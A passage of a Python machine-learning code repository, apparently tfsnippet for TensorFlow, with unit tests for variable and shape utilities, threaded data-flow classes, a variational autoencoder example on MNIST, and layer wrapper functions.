{'a': a, 'c': c, 'child/a': child_a, 'child/c': child_c}
)
self.assertEqual(
get_variables_as_dict(collection=LOCAL_VARIABLES),
{}
)
self.assertEqual(
get_variables_as_dict(''),
{'a': a, 'b': b, 'child/a': child_a, 'child/b': child_b}
)
self.assertEqual(
get_variables_as_dict('child'),
{'a': child_a, 'b': child_b}
)
self.assertEqual(
get_variables_as_dict('child/'),
{'a': child_a, 'b': child_b}
)
self.assertEqual(
get_variables_as_dict(child),
{'a': child_a, 'b': child_b}
)
self.assertEqual(
get_variables_as_dict('child', collection=MODEL_VARIABLES),
{'a': child_a, 'c': child_c}
)
self.assertEqual(
get_variables_as_dict('child', collection=LOCAL_VARIABLES),
{}
)
self.assertEqual(
get_variables_as_dict('non_exist'),
{}
)
class GetUninitializedVariablesTestCase(tf.test.TestCase):
def test_get_uninitialized_variables(self):
with self.test_session() as sess:
a = tf.get_variable('a', dtype=tf.int32, initializer=1)
b = tf.get_variable('b', dtype=tf.int32, initializer=2)
c = tf.get_variable('c', dtype=tf.int32, initializer=3,
collections=[tf.GraphKeys.MODEL_VARIABLES])
d = tf.get_variable('d', dtype=tf.int32, initializer=4,
collections=[tf.GraphKeys.MODEL_VARIABLES])
self.assertEqual(
get_uninitialized_variables(),
[a, b]
)
self.assertEqual(
get_uninitialized_variables([a, b, c, d]),
[a, b, c, d]
)
sess.run(tf.variables_initializer([a, c]))
self.assertEqual(
get_uninitialized_variables(),
[b]
)
self.assertEqual(
get_uninitialized_variables([a, b, c, d]),
[b, d]
)
sess.run(tf.variables_initializer([b, d]))
self.assertEqual(
get_uninitialized_variables(),
[]
)
self.assertEqual(
get_uninitialized_variables([a, b, c, d]),
[]
)
class EnsureVariablesInitializedTestCase(tf.test.TestCase):
def test_ensure_variables_initialized(self):
a = tf.get_variable('a', dtype=tf.int32, initializer=1)
b = tf.get_variable('b', dtype=tf.int32, initializer=2)
c = tf.get_variable('c', dtype=tf.int32, initializer=3,
collections=[tf.GraphKeys.MODEL_VARIABLES])
d = tf.get_variable('d', dtype=tf.int32, initializer=4,
collections=[tf.GraphKeys.MODEL_VARIABLES])
# test using list
with self.test_session():
self.assertEqual(
get_uninitialized_variables([a, b, c, d]),
[a, b, c, d]
)
ensure_variables_initialized()
self.assertEqual(
get_uninitialized_variables([a, b, c, d]),
[c, d]
)
ensure_variables_initialized([a, b, c, d])
self.assertEqual(
get_uninitialized_variables([a, b, c, d]),
[]
)
def test_ensure_variables_initialized_using_dict(self):
a = tf.get_variable('a', dtype=tf.int32, initializer=1)
b = tf.get_variable('b', dtype=tf.int32, initializer=2)
# test using dict
with self.test_session():
ensure_variables_initialized({'a': a})
self.assertEqual(
get_uninitialized_variables([a, b]),
[b]
)
class GetVariableDDITestCase(tf.test.TestCase):
def test_get_variable_ddi(self):
# test collections
def g(name, initial_value, initializing=False, collections=None):
v = get_variable_ddi(
name, initial_value, shape=(), initializing=initializing,
collections=collections
)
# ensure `get_variable_ddi` will add the variable to collections
for coll in (collections or [tf.GraphKeys.GLOBAL_VARIABLES]):
self.assertEqual(
tf.get_collection(coll)[-1].name.rsplit('/', 1)[-1],
name + ':0'
)
return v
_ = g('var', 0., initializing=True,
collections=[tf.GraphKeys.MODEL_VARIABLES])
# test reuse
@global_reuse
def f(initial_value, initializing=False):
return g('x', initial_value, initializing=initializing)
with self.test_session() as sess:
x_in = tf.placeholder(dtype=tf.float32, shape=())
x = f(x_in, initializing=True)
self.assertEqual(sess.run(x, feed_dict={x_in: 123.}), 123.)
x = f(x_in, initializing=False)
self.assertEqual(sess.run(x, feed_dict={x_in: 456.}), 123.)
```
#### File: tests/utils/test_shape_utils.py
```python
import pytest
import numpy as np
import tensorflow as tf
from tfsnippet.utils import *
class IntShapeTestCase(tf.test.TestCase):
def test_int_shape(self):
self.assertEqual(get_static_shape(tf.zeros([1, 2, 3])), (1, 2, 3))
self.assertEqual(
get_static_shape(tf.placeholder(tf.float32, [None, 2, 3])),
(None, 2, 3)
)
self.assertIsNone(get_static_shape(tf.placeholder(tf.float32, None)))
class ResolveNegativeAxisTestCase(tf.test.TestCase):
def test_resolve_negative_axis(self):
# good case
self.assertEqual(resolve_negative_axis(4, (0, 1, 2)), (0, 1, 2))
self.assertEqual(resolve_negative_axis(4, (0, -1, -2)), (0, 3, 2))
# bad case
with pytest.raises(ValueError, match='`axis` out of range: \\(-5,\\) '
'vs ndims 4.'):
_ = resolve_negative_axis(4, (-5,))
with pytest.raises(ValueError, match='`axis` has duplicated elements '
'after resolving negative axis.'):
_ = resolve_negative_axis(4, (0, -4))
class GetBatchSizeTestCase(tf.test.TestCase):
def test_get_batch_size(self):
def run_check(sess, x, axis, x_in=None, dynamic=True):
if x_in is None:
x_in = tf.constant(x)
dynamic = False
batch_size = get_batch_size(x_in, axis)
if dynamic:
self.assertIsInstance(batch_size, tf.Tensor)
self.assertEqual(sess.run(batch_size, feed_dict={x_in: x}),
x.shape[axis])
else:
self.assertEqual(batch_size, x.shape[axis])
with self.test_session() as sess:
x = np.zeros([2, 3, 4], dtype=np.float32)
# check when shape is totally static
run_check(sess, x, 0)
run_check(sess, x, 1)
run_check(sess, x, 2)
run_check(sess, x, -1)
# check when some shape is dynamic, but the batch axis is not
run_check(sess, x, 0, tf.placeholder(tf.float32, [2, None, None]),
dynamic=False)
run_check(sess, x, 1, tf.placeholder(tf.float32, [None, 3, None]),
dynamic=False)
run_check(sess, x, 2, tf.placeholder(tf.float32, [None, None, 4]),
dynamic=False)
run_check(sess, x, -1, tf.placeholder(tf.float32, [None, None, 4]),
dynamic=False)
# check when the batch axis is dynamic
run_check(sess, x, 0, tf.placeholder(tf.float32, [None, 3, 4]),
dynamic=True)
run_check(sess, x, 1, tf.placeholder(tf.float32, [2, None, 4]),
dynamic=True)
run_check(sess, x, 2, tf.placeholder(tf.float32, [2, 3, None]),
dynamic=True)
run_check(sess, x, -1, tf.placeholder(tf.float32, [2, 3, None]),
dynamic=True)
# check when the shape is totally dynamic
x_in = tf.placeholder(tf.float32, None)
run_check(sess, x, 0, x_in, dynamic=True)
run_check(sess, x, 1, x_in, dynamic=True)
run_check(sess, x, 2, x_in, dynamic=True)
run_check(sess, x, -1, x_in, dynamic=True)
class GetRankTestCase(tf.test.TestCase):
def test_get_rank(self):
with self.test_session() as sess:
# test static shape
ph = tf.placeholder(tf.float32, (1, 2, 3))
self.assertEqual(get_rank(ph), 3)
# test partially dynamic shape
ph = tf.placeholder(tf.float32, (1, None, 3))
self.assertEqual(get_rank(ph), 3)
# test totally dynamic shape
ph = tf.placeholder(tf.float32, None)
self.assertEqual(
sess.run(get_rank(ph), feed_dict={
ph: np.arange(6, dtype=np.float32).reshape((1, 2, 3))
}),
3
)
class GetDimensionSizeTestCase(tf.test.TestCase):
def test_get_dimension_size(self):
with self.test_session() as sess:
# test static shape
ph = tf.placeholder(tf.float32, (1, 2, 3))
self.assertEqual(get_dimension_size(ph, 0), 1)
self.assertEqual(get_dimension_size(ph, 1), 2)
self.assertEqual(get_dimension_size(ph, 2), 3)
self.assertEqual(get_dimension_size(ph, -1), 3)
# test dynamic shape, but no dynamic axis is queried
ph = tf.placeholder(tf.float32, (1, None, 3))
self.assertEqual(get_dimension_size(ph, 0), 1)
self.assertEqual(get_dimension_size(ph, 2), 3)
self.assertEqual(get_dimension_size(ph, -1), 3)
# test dynamic shape
def _assert_equal(a, b):
self.assertIsInstance(a, tf.Tensor)
self.assertEqual(sess.run(a, feed_dict={ph: ph_in}), b)
ph = tf.placeholder(tf.float32, (1, None, 3))
ph_in = np.arange(6, dtype=np.float32).reshape((1, 2, 3))
_assert_equal(get_dimension_size(ph, 1), 2)
_assert_equal(get_dimension_size(ph, -2), 2)
axis_ph = tf.placeholder(tf.int32, None)
self.assertEqual(
sess.run(get_dimension_size(ph, axis_ph),
feed_dict={ph: ph_in, axis_ph: 1}),
2
)
# test fully dynamic shape
ph = tf.placeholder(tf.float32, None)
_assert_equal(get_dimension_size(ph, 0), 1)
_assert_equal(get_dimension_size(ph, 1), 2)
_assert_equal(get_dimension_size(ph, 2), 3)
_assert_equal(get_dimension_size(ph, -2), 2)
def test_get_dimensions_size(self):
with self.test_session() as sess:
# test empty query
ph = tf.placeholder(tf.float32, None)
self.assertTupleEqual(get_dimensions_size(ph, ()), ())
# test static shape
ph = tf.placeholder(tf.float32, (1, 2, 3))
self.assertTupleEqual(get_dimensions_size(ph), (1, 2, 3))
self.assertTupleEqual(get_dimensions_size(ph, [0]), (1,))
self.assertTupleEqual(get_dimensions_size(ph, [1]), (2,))
self.assertTupleEqual(get_dimensions_size(ph, [2]), (3,))
self.assertTupleEqual(get_dimensions_size(ph, [2, 0, 1]), (3, 1, 2))
# test dynamic shape, but no dynamic axis is queried
ph = tf.placeholder(tf.float32, (1, None, 3))
self.assertTupleEqual(get_dimensions_size(ph, [0]), (1,))
self.assertTupleEqual(get_dimensions_size(ph, [2]), (3,))
self.assertTupleEqual(get_dimensions_size(ph, [2, 0]), (3, 1))
# test dynamic shape
def _assert_equal(a, b):
ph_in = np.arange(6, dtype=np.float32).reshape((1, 2, 3))
self.assertIsInstance(a, tf.Tensor)
np.testing.assert_equal(sess.run(a, feed_dict={ph: ph_in}), b)
ph = tf.placeholder(tf.float32, (1, None, 3))
_assert_equal(get_dimensions_size(ph), (1, 2, 3))
_assert_equal(get_dimensions_size(ph, [1]), (2,))
_assert_equal(get_dimensions_size(ph, [2, 0, 1]), (3, 1, 2))
# test fully dynamic shape
ph = tf.placeholder(tf.float32, None)
_assert_equal(get_dimensions_size(ph), (1, 2, 3))
_assert_equal(get_dimensions_size(ph, [0]), (1,))
_assert_equal(get_dimensions_size(ph, [1]), (2,))
_assert_equal(get_dimensions_size(ph, [2]), (3,))
_assert_equal(get_dimensions_size(ph, [2, 0, 1]), (3, 1, 2))
def test_get_shape(self):
with self.test_session() as sess:
# test static shape
ph = tf.placeholder(tf.float32, (1, 2, 3))
self.assertTupleEqual(get_shape(ph), (1, 2, 3))
# test dynamic shape
def _assert_equal(a, b):
ph_in = np.arange(6, dtype=np.float32).reshape((1, 2, 3))
self.assertIsInstance(a, tf.Tensor)
np.testing.assert_equal(sess.run(a, feed_dict={ph: ph_in}), b)
ph = tf.placeholder(tf.float32, (1, None, 3))
_assert_equal(get_shape(ph), (1, 2, 3))
# test fully dynamic shape
ph = tf.placeholder(tf.float32, None)
_assert_equal(get_shape(ph), (1, 2, 3))
class ConcatShapesTestCase(tf.test.TestCase):
def test_concat_shapes(self):
with self.test_session() as sess:
# test empty
self.assertTupleEqual(concat_shapes(()), ())
# test static shapes
self.assertTupleEqual(
concat_shapes(iter([
(1, 2),
(3,),
(),
(4, 5)
])),
(1, 2, 3, 4, 5)
)
# test having dynamic shape
shape = concat_shapes([
(1, 2),
tf.constant([3], dtype=tf.int32),
(),
tf.constant([4, 5], dtype=tf.int32),
])
self.assertIsInstance(shape, tf.Tensor)
np.testing.assert_equal(sess.run(shape), (1, 2, 3, 4, 5))
class IsShapeEqualTestCase(tf.test.TestCase):
def test_is_shape_equal(self):
def check(x, y, x_ph=None, y_ph=None):
ans = x.shape == y.shape
feed_dict = {}
if x_ph is not None:
feed_dict[x_ph] = x
x = x_ph
if y_ph is not None:
feed_dict[y_ph] = y
y = y_ph
result = is_shape_equal(x, y)
if is_tensor_object(result):
result = sess.run(result, feed_dict=feed_dict)
self.assertEqual(result, ans)
with self.test_session() as sess:
# check static shapes
x1 = np.random.normal(size=[2, 3, 4])
x2 = np.random.normal(size=[2, 1, 4])
x3 = np.random.normal(size=[1, 2, 3, 4])
check(x1, np.copy(x1))
check(x1, x2)
check(x1, x3)
# check partial dynamic shapes
x1_ph = tf.placeholder(dtype=tf.float32, shape=[2, None, 4])
x2_ph = tf.placeholder(dtype=tf.float32, shape=[2, None, 4])
x3_ph = tf.placeholder(dtype=tf.float32, shape=[None] * 4)
check(x1, np.copy(x1), x1_ph, x2_ph)
check(x1, x2, x1_ph, x2_ph)
check(x1, x3, x1_ph, x3_ph)
# check fully dimension shapes
x1_ph = tf.placeholder(dtype=tf.float32, shape=None)
x2_ph = tf.placeholder(dtype=tf.float32, shape=None)
x3_ph = tf.placeholder(dtype=tf.float32, shape=None)
check(x1, np.copy(x1), x1_ph, x2_ph)
check(x1, x2, x1_ph, x2_ph)
check(x1, x3, x1_ph, x3_ph)
```
#### File: tests/utils/test_tfver.py
```python
import unittest
import tensorflow as tf
from tfsnippet.utils import is_tensorflow_version_higher_or_equal
class IsTensorflowVersionHigherOrEqualTestCase(unittest.TestCase):
def test_is_tensorflow_version_higher_or_equal(self):
# test compatibility with current version
tf_version = tf.__version__
self.assertTrue(is_tensorflow_version_higher_or_equal(tf_version),
msg='{} >= {} not hold'.format(tf_version, tf_version))
# test various cases
try:
versions = [
'0.1.0', '0.9.0', '0.12.0', '0.12.1',
'1.0.0-rc0', '1.0.0-rc1', '1.0.0', '1.0.1',
]
for i, v0 in enumerate(versions):
tf.__version__ = v0
for v in versions[:i+1]:
self.assertTrue(is_tensorflow_version_higher_or_equal(v),
msg='{} >= {} not hold'.format(v0, v))
for v in versions[i+1:]:
self.assertFalse(is_tensorflow_version_higher_or_equal(v),
msg='{} < {} not hold'.format(v0, v))
finally:
tf.__version__ = tf_version
```
#### File: tests/variational/test_chain.py
```python
import numpy as np
import tensorflow as tf
from mock import Mock
from tfsnippet.variational import VariationalChain, VariationalInference
class VariationalChainTestCase(tf.test.TestCase):
def prepare_model(self):
variational_local_log_probs = Mock(
return_value=[tf.constant(1.), tf.constant(2.)])
variational = Mock(
local_log_probs=Mock(
wraps=lambda names: variational_local_log_probs(tuple(names))),
__iter__=Mock(return_value=iter(['a', 'b'])),
)
model_local_log_probs = Mock(
return_value=[tf.constant(3.), tf.constant(4.)])
model = Mock(
local_log_probs=Mock(
wraps=lambda names: model_local_log_probs(tuple(names))),
__iter__=Mock(return_value=iter(['c', 'd'])),
)
return (variational_local_log_probs, variational,
model_local_log_probs, model)
def test_default_args(self):
(variational_local_log_probs, variational,
model_local_log_probs, model) = self.prepare_model()
chain = VariationalChain(variational, model)
self.assertEqual(variational_local_log_probs.call_args,
((('a', 'b'),),))
self.assertEqual(model_local_log_probs.call_args,
((('c', 'd'),),))
self.assertIs(chain.variational, variational)
self.assertIs(chain.model, model)
self.assertEqual(chain.latent_names, ('a', 'b'))
self.assertIsNone(chain.latent_axis)
self.assertIsInstance(chain.vi, VariationalInference)
with self.test_session() as sess:
np.testing.assert_allclose(chain.log_joint.eval(), 7.)
np.testing.assert_allclose(chain.vi.log_joint.eval(), 7.)
np.testing.assert_allclose(sess.run(chain.vi.latent_log_probs),
[1., 2.])
def test_log_joint_arg(self):
(variational_local_log_probs, variational,
model_local_log_probs, model) = self.prepare_model()
chain = VariationalChain(variational, model, log_joint=tf.constant(-1.))
self.assertEqual(variational_local_log_probs.call_args,
((('a', 'b'),),))
self.assertFalse(model_local_log_probs.called)
with self.test_session():
np.testing.assert_allclose(chain.log_joint.eval(), -1.)
np.testing.assert_allclose(chain.vi.log_joint.eval(), -1.)
def test_latent_names_arg(self):
(variational_local_log_probs, variational,
model_local_log_probs, model) = self.prepare_model()
chain = VariationalChain(variational, model, latent_names=iter(['a']))
self.assertEqual(variational_local_log_probs.call_args,
((('a',),),))
self.assertEqual(model_local_log_probs.call_args,
((('c', 'd'),),))
self.assertEqual(chain.latent_names, ('a',))
def test_latent_axis_arg(self):
(variational_local_log_probs, variational,
model_local_log_probs, model) = self.prepare_model()
chain = VariationalChain(variational, model, latent_axis=1)
self.assertEqual(chain.latent_axis, 1)
self.assertEqual(chain.vi.axis, 1)
```
#### File: tfsnippet/dataflow/iterator_flow.py
```python
from .base import DataFlow
__all__ = ['IteratorFactoryFlow']
class IteratorFactoryFlow(DataFlow):
"""
Data flow constructed from an iterator factory.
Usage::
x_flow = DataFlow.arrays([x], batch_size=256)
y_flow = DataFlow.arrays([y], batch_size=256)
xy_flow = DataFlow.iterator_factory(lambda: (
(x, y) for (x,), (y,) in zip(x_flow, y_flow)
))
"""
def __init__(self, factory):
"""
Construct an :class:`IteratorFlow`.
Args:
factory (() -> Iterator or Iterable): A factory method for
constructing the mini-batch iterators for each epoch.
"""
self._factory = factory
def _minibatch_iterator(self):
for batch in self._factory():
yield batch
```
#### File: tfsnippet/dataflow/threading_flow.py
```python
from threading import Thread, Semaphore
import six
from logging import getLogger
from tfsnippet.utils import AutoInitAndCloseable
from .base import DataFlow
if six.PY2:
from Queue import Queue
else:
from queue import Queue
__all__ = ['ThreadingFlow']
class ThreadingFlow(DataFlow, AutoInitAndCloseable):
"""
Data flow to prefetch from the source data flow in a background thread.
Usage::
array_flow = DataFlow.arrays([x, y], batch_size=256)
with array_flow.threaded(prefetch=5) as df:
for epoch in epochs:
for batch_x, batch_y in df:
...
"""
EPOCH_END = object()
"""Object to mark an ending position of an epoch."""
def __init__(self, source, prefetch):
"""
Construct a :class:`ThreadingFlow`.
Args:
source (DataFlow): The source data flow.
prefetch (int): Number of mini-batches to prefetch ahead.
It should be at least 1.
"""
# check the parameters
if prefetch < 1:
raise ValueError('`prefetch_num` must be at least 1')
# memorize the parameters
self._source = source
self._prefetch_num = prefetch
# internal states for background worker
self._worker = None # type: Thread
self._batch_queue = None # type: Queue
self._epoch_counter = None # counter for tracking the active epoch
self._stopping = None
self._worker_alive = None
self._worker_ready_sem = None
@property
def source(self):
"""Get the source data flow."""
return self._source
@property
def prefetch_num(self):
"""Get the number of batches to prefetch."""
return self._prefetch_num
def _worker_func(self):
active_epoch = self._epoch_counter
self._worker_alive = True
self._worker_ready_sem.release()
try:
while not self._stopping:
# iterate through the mini-batches in the current epoch
for batch in self.source:
if self._stopping or active_epoch < self._epoch_counter:
break
self._batch_queue.put((active_epoch, batch))
# put the epoch ending mark into the queue
if not self._stopping:
self._batch_queue.put((active_epoch, self.EPOCH_END))
# move to the next epoch
active_epoch += 1
except Exception: # pragma: no cover
getLogger(__name__).warning(
'{} exited because of error.'.format(self.__class__.__name__),
exc_info=True
)
raise
finally:
self._worker_alive = False
def _init(self):
# prepare for the worker states
self._batch_queue = Queue(self.prefetch_num)
self._epoch_counter = 0
self._stopping = False
self._worker_ready_sem = Semaphore(value=0)
# create and start the worker
self._worker = Thread(target=self._worker_func)
self._worker.daemon = True
self._worker.start()
# wait for the thread to show up
self._worker_ready_sem.acquire()
def _close(self):
try:
# prevent the worker thread from further work
self._stopping = True
# exhaust all remaining queue items to notify the background worker
while not self._batch_queue.empty():
self._batch_queue.get()
# wait until the worker exit
self._worker.join()
finally:
self._worker = None
self._batch_queue = None
self._worker_ready_sem = None
self._initialized = False
def _minibatch_iterator(self):
self.init()
try:
# iterate through one epoch
while self._worker_alive:
epoch, payload = self._batch_queue.get()
if epoch < self._epoch_counter:
# we've got a remaining item from the last epoch, skip it
pass
elif epoch > self._epoch_counter: # pragma: no cover
# we've accidentally got an item from the future epoch
# it should be a bug, and we shall report it
raise RuntimeError('Unexpected entry from future epoch.')
elif payload is self.EPOCH_END:
# we've got the epoch ending mark for the current epoch,
# so we should break the loop
break
else:
# we've got a normal batch for the current epoch,
# so yield it
yield payload
finally:
self._epoch_counter += 1
```
#### File: examples/auto_encoders/vae.py
```python
import functools
import click
import tensorflow as tf
from tensorflow.contrib.framework import arg_scope, add_arg_scope
from tfsnippet.bayes import BayesianNet
from tfsnippet.distributions import Normal, Bernoulli
from tfsnippet.examples.datasets import load_mnist, bernoulli_flow
from tfsnippet.examples.nn import (l2_regularizer,
regularization_loss,
dense)
from tfsnippet.examples.utils import (MLConfig,
MLResults,
save_images_collection,
config_options,
pass_global_config,
bernoulli_as_pixel,
print_with_title)
from tfsnippet.scaffold import TrainLoop
from tfsnippet.trainer import AnnealingDynamicValue, Trainer, Evaluator
from tfsnippet.utils import global_reuse, flatten, unflatten, create_session
class ExpConfig(MLConfig):
# model parameters
z_dim = 40
x_dim = 784
# training parameters
write_summary = False
max_epoch = 3000
max_step = None
batch_size = 128
l2_reg = 0.0001
initial_lr = 0.001
lr_anneal_factor = 0.5
lr_anneal_epoch_freq = 300
lr_anneal_step_freq = None
# evaluation parameters
test_n_z = 500
test_batch_size = 128
@global_reuse
@add_arg_scope
@pass_global_config
def q_net(config, x, observed=None, n_z=None, is_training=True):
net = BayesianNet(observed=observed)
# compute the hidden features
with arg_scope([dense],
activation_fn=tf.nn.leaky_relu,
kernel_regularizer=l2_regularizer(config.l2_reg)):
h_x = tf.to_float(x)
h_x = dense(h_x, 500)
h_x = dense(h_x, 500)
# sample z ~ q(z|x)
z_mean = dense(h_x, config.z_dim, name='z_mean')
z_logstd = dense(h_x, config.z_dim, name='z_logstd')
z = net.add('z', Normal(mean=z_mean, logstd=z_logstd), n_samples=n_z,
group_ndims=1)
return net
@global_reuse
@add_arg_scope
@pass_global_config
def p_net(config, observed=None, n_z=None, is_training=True):
net = BayesianNet(observed=observed)
# sample z ~ p(z)
z = net.add('z', Normal(mean=tf.zeros([1, config.z_dim]),
logstd=tf.zeros([1, config.z_dim])),
group_ndims=1, n_samples=n_z)
# compute the hidden features
with arg_scope([dense],
activation_fn=tf.nn.leaky_relu,
kernel_regularizer=l2_regularizer(config.l2_reg)):
h_z, s1, s2 = flatten(z, 2)
h_z = dense(h_z, 500)
h_z = dense(h_z, 500)
# sample x ~ p(x|z)
x_logits = unflatten(dense(h_z, config.x_dim, name='x_logits'), s1, s2)
x = net.add('x', Bernoulli(logits=x_logits), group_ndims=1)
return net
@click.command()
@click.option('--result-dir', help='The result directory.', metavar='PATH',
required=False, type=str)
@config_options(ExpConfig)
@pass_global_config
def main(config, result_dir):
# print the config
print_with_title('Configurations', config.format_config(), after='\n')
# open the result object and prepare for result directories
results = MLResults(result_dir)
results.make_dirs('plotting', exist_ok=True)
results.make_dirs('train_summary', exist_ok=True)
# input placeholders
input_x = tf.placeholder(
dtype=tf.int32, shape=(None, config.x_dim), name='input_x')
is_training = tf.placeholder(
dtype=tf.bool, shape=(), name='is_training')
learning_rate = tf.placeholder(shape=(), dtype=tf.float32)
learning_rate_var = AnnealingDynamicValue(config.initial_lr,
config.lr_anneal_factor)
# build the model
with arg_scope([q_net, p_net], is_training=is_training):
# derive the loss and lower-bound for training
train_q_net = q_net(input_x)
train_chain = train_q_net.chain(
p_net, latent_names=['z'], latent_axis=0, observed={'x': input_x})
vae_loss = tf.reduce_mean(train_chain.vi.training.sgvb())
loss = vae_loss + regularization_loss()
# derive the nll and logits output for testing
test_q_net = q_net(input_x, n_z=config.test_n_z)
test_chain = test_q_net.chain(
p_net, latent_names=['z'], latent_axis=0, observed={'x': input_x})
test_nll = -tf.reduce_mean(test_chain.vi.evaluation.is_loglikelihood())
test_lb = tf.reduce_mean(test_chain.vi.lower_bound.elbo())
# derive the optimizer
optimizer = tf.train.AdamOptimizer(learning_rate)
params = tf.trainable_variables()
grads = optimizer.compute_gradients(loss, var_list=params)
with tf.control_dependencies(
tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
train_op = optimizer.apply_gradients(grads)
# derive the plotting function
with tf.name_scope('plot_x'):
plot_p_net = p_net(n_z=100, is_training=is_training)
x_plots = tf.reshape(bernoulli_as_pixel(plot_p_net['x']), (-1, 28, 28))
def plot_samples(loop):
with loop.timeit('plot_time'):
images = session.run(x_plots, feed_dict={is_training: False})
save_images_collection(
images=images,
filename='plotting/{}.png'.format(loop.epoch),
grid_size=(10, 10),
results=results
)
# prepare for training and testing data
(x_train, y_train), (x_test, y_test) = load_mnist()
train_flow = bernoulli_flow(
x_train, config.batch_size, shuffle=True, skip_incomplete=True)
test_flow = bernoulli_flow(
x_test, config.test_batch_size, sample_now=True)
with create_session().as_default() as session, \
train_flow.threaded(5) as train_flow:
# train the network
with TrainLoop(params,
var_groups=['q_net', 'p_net'],
max_epoch=config.max_epoch,
max_step=config.max_step,
summary_dir=(results.system_path('train_summary')
if config.write_summary else None),
summary_graph=tf.get_default_graph(),
early_stopping=False) as loop:
trainer = Trainer(
loop, train_op, [input_x], train_flow,
feed_dict={learning_rate: learning_rate_var, is_training: True},
metrics={'loss': loss}
)
trainer.anneal_after(
learning_rate_var,
epochs=config.lr_anneal_epoch_freq,
steps=config.lr_anneal_step_freq
)
evaluator = Evaluator(
loop,
metrics={'test_nll': test_nll, 'test_lb': test_lb},
inputs=[input_x],
data_flow=test_flow,
feed_dict={is_training: False},
time_metric_name='test_time'
)
evaluator.after_run.add_hook(
lambda: results.update_metrics(evaluator.last_metrics_dict))
trainer.evaluate_after_epochs(evaluator, freq=10)
trainer.evaluate_after_epochs(
functools.partial(plot_samples, loop), freq=10)
trainer.log_after_epochs(freq=1)
trainer.run()
# print the final metrics and close the results object
print_with_title('Results', results.format_metrics(), before='\n')
results.close()
if __name__ == '__main__':
main()
```
#### File: examples/datasets/utils.py
```python
import numpy as np
from tfsnippet.dataflow import DataFlow
from tfsnippet.preprocessing import BernoulliSampler, UniformNoiseSampler
__all__ = ['bernoulli_flow', 'quantized_flow']
def _create_sampled_dataflow(arrays, sampler, sample_now, **kwargs):
if sample_now:
arrays = sampler(*arrays)
df = DataFlow.arrays(arrays, **kwargs)
if not sample_now:
df = df.map(sampler)
return df
def bernoulli_flow(x, batch_size, shuffle=False, skip_incomplete=False,
sample_now=False, dtype=np.int32, random_state=None):
"""
Construct a new :class:`DataFlow`, which samples 0/1 binary images
according to the given `x` array.
Args:
x: The `train_x` or `test_x` of an image dataset. The pixel values
must be 8-bit integers, having the range of ``[0, 255]``.
batch_size (int): Size of each mini-batch.
shuffle (bool): Whether or not to shuffle data before iterating?
(default :obj:`False`)
skip_incomplete (bool): Whether or not to exclude the last
mini-batch if it is incomplete? (default :obj:`False`)
sample_now (bool): Whether or not to sample immediately instead
of sampling at the beginning of each epoch? (default :obj:`False`)
dtype: The data type of the sampled array. Default `np.int32`.
random_state (RandomState): Optional numpy RandomState for
shuffling data before each epoch. (default :obj:`None`,
use the global :class:`RandomState`).
Returns:
DataFlow: The Bernoulli `x` flow.
"""
x = np.asarray(x)
# prepare the sampler
x = x / np.asarray(255., dtype=x.dtype)
sampler = BernoulliSampler(dtype=dtype, random_state=random_state)
# compose the data flow
return _create_sampled_dataflow(
[x], sampler, sample_now, batch_size=batch_size, shuffle=shuffle,
skip_incomplete=skip_incomplete, random_state=random_state
)
def quantized_flow(x, batch_size, shuffle=False, skip_incomplete=False,
normalize=False, sample_now=False, dtype=np.float32,
random_state=None):
"""
Construct a new :class:`DataFlow`, which adds uniform noises onto
the given `x` array.
Args:
x: The `train_x` or `test_x` of an image dataset. The pixel values
must be 8-bit integers, having the range of ``[0, 255]``.
batch_size (int): Size of each mini-batch.
shuffle (bool): Whether or not to shuffle data before iterating?
(default :obj:`False`)
skip_incomplete (bool): Whether or not to exclude the last
mini-batch if it is incomplete? (default :obj:`False`)
normalize (bool): Whether or not to normalize the sampled array?
If :obj:`True`, the sampled array would range in ``[0, 1)``.
If :obj:`True`, the sampled array would range in ``[0, 256)``.
Default :obj:`True`.
sample_now (bool): Whether or not to sample immediately instead
of sampling at the beginning of each epoch? (default :obj:`False`)
dtype: The data type of the sampled array. Default `np.float32`.
random_state (RandomState): Optional numpy RandomState for
shuffling data before each epoch. (default :obj:`None`,
use the global :class:`RandomState`).
Returns:
DataFlow: The quantized `x` flow.
"""
x = np.asarray(x)
# prepare the sampler
if normalize:
x = x / np.asarray(256., dtype=x.dtype)
maxval = np.asarray(1 / 256., dtype=x.dtype)
else:
maxval = np.asarray(1., dtype=x.dtype)
minval = np.asarray(0., dtype=x.dtype)
sampler = UniformNoiseSampler(minval=minval, maxval=maxval, dtype=dtype,
random_state=random_state)
# compose the data flow
return _create_sampled_dataflow(
[x], sampler, sample_now, batch_size=batch_size, shuffle=shuffle,
skip_incomplete=skip_incomplete, random_state=random_state
)
```
#### File: examples/nn/wrapper.py
```python
import tensorflow as tf
from tensorflow.contrib.framework import add_arg_scope
from tfsnippet.examples.utils import (add_variable_scope,
validate_strides_or_kernel_size)
__all__ = [
'dense', 'conv2d', 'deconv2d', 'batch_norm_2d',
]
@add_arg_scope
@add_variable_scope
def dense(inputs,
units,
activation_fn=None,
normalizer_fn=None,
use_bias=True,
kernel_initializer=None,
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None):
output = tf.layers.dense(
inputs=inputs,
units=units,
use_bias=use_bias and (normalizer_fn is None),
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
trainable=trainable,
name='activation'
)
if normalizer_fn is not None:
output = normalizer_fn(output)
if activation_fn is not None:
output = activation_fn(output)
return output
@add_arg_scope
@add_variable_scope
def conv2d(inputs,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
channels_last=False,
use_bias=True,
activation_fn=None,
normalizer_fn=None,
kernel_initializer=None,
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None):
output = tf.layers.conv2d(
inputs=inputs,
filters=filters,
kernel_size=validate_strides_or_kernel_size('kernel_size', kernel_size),
strides=validate_strides_or_kernel_size('strides', strides),
padding=padding,
data_format='channels_last' if channels_last else 'channels_first',
use_bias=use_bias and (normalizer_fn is None),
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
trainable=trainable,
name='activation'
)
if normalizer_fn is not None:
output = normalizer_fn(output)
if activation_fn is not None:
output = activation_fn(output)
